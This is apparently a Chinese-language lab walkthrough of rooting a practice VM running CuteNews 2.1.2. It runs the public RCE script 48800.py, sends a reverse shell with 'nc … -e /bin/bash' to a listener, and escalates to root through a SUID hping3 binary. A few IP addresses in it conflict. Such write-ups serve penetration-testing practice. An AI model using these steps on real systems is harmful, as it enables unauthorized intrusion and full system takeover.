1.修改靶机网卡
打开靶机使用kali扫描发现扫描不到靶机的ip地址,于是在靶机开机的时候长按shift键,出现如下画面
然后按键盘的e键,出现如下画面,将ro quiet修改为rw signie init=/bin/bash然后按Ctrl+X
进入系统然后输入lsb_release -a来查看系统的版本,发现是Debain,因为Debain的网卡默认位置为/etc/network/interfaces,所以ip addr 查看一下网卡的名字为ens33后直接vi /etc/network/interfaces如下
将网卡的名字修改为ens33后按ESC,输入:wq! 重启即可!
2.启动kali寻找漏洞
kali的ip地址为192.168.2.15
靶机的ip为192.168.2.29
arp-scan -l,发现靶机ip为192.168.2.29
使用nmap -p- -sV -A 192.168.2.29 来扫描靶机所有的信息
因为有80端口所以http一下
使用dirsearch来扫描一下网站目录,
访问一下这个index.php,进入了一个cutenews系统,系统版本为2.1.2,实行了sql注入没有成功,然后我又注册了一个账号登录进去之后有个上传文件的地方,我上传php也没有成功,然后因为这个版本号是有漏洞的嘛,所以使用漏洞利用
Cutenews是一款功能强大的新闻管理系统,使用平坦式文件存储。然而,该系统在处理用户提交的请求参数时存在漏洞,远程攻击者可能利用此漏洞在主机上执行任意命令。在管理帐号编辑模板文件的时候,所以CuteNews不能正确的过滤用户输入
3.利用searchsploit扫描漏洞
searchsploit是一个用于Exploit-DB的命令行搜索工具,可以帮助用户查找渗透模块。它允许用户通过命令行界面搜索Metasploit Exploit库中的漏洞模块,从而查找当前系统可能存在的漏洞、利用方式和漏洞类型。该工具可以轻松快捷地搜索各种漏洞的模块和信息
输入命令searchsploit cutenews后,发现有一个远程代码执行的脚本
输入locate 48800.py //locate是快速查找文件目录的命令,查找到这个脚本的路径后拷贝到当前目录:
然后vi 48800.py看一下这个脚本文件,然后python 48800.py来执行了一下这个脚本输入http://192.168.2.19具体一串报错,然后我在vi 48800.py看到每一个网站路径ip后面都有一个cutenews,但是我在浏览器访问的时候ip后面并没有cutenews这个路径,于是用kali的文本编辑器将48800.py的cutenews给替换为空
再执行一些python 48800.py 输入靶机ip http://192.168.2.29然后提示说创建了一个用户...
并且返回了一个command,似乎是一个shell,pwd一下试试,然后whoami看看
确实是一个shell,但是交互界面不太好用,于是输入命令whereis nc 发现靶机上也是有nc的这样的话可以通过命令行将shell推到自己的电脑上
于是在靶机上执行nc 192.168.2.25 4444 -e /bin/bash并且在本机上nc -nlvp 4444来监听4444端口shell被推过来了
然后python -c 'import pty;pty.spawn("/bin/bash")' 来切换交互界面
sudo -l //来查看sudo命令发现有一个hping3,这个hping通过sudo是可以实现越权的(sudo hping)但是需要密码(sudo hping3)要是sudo hping3 --icmp的话也不行需要带地址因为有icmp,所以执行find / -perm -u=s -type f 2>/dev/null查看以root权限来执行的命令,发现也有hping3,然后sudo -l /usr/sbin/hping3发现他可以用root来运行,所以使用越权方式/usr/sbin/hping3
bash -p //使用bash为优先启动模式
执行id ,whoami看到已经是root用户权限了
然后cd root
cat root.txt
解题成功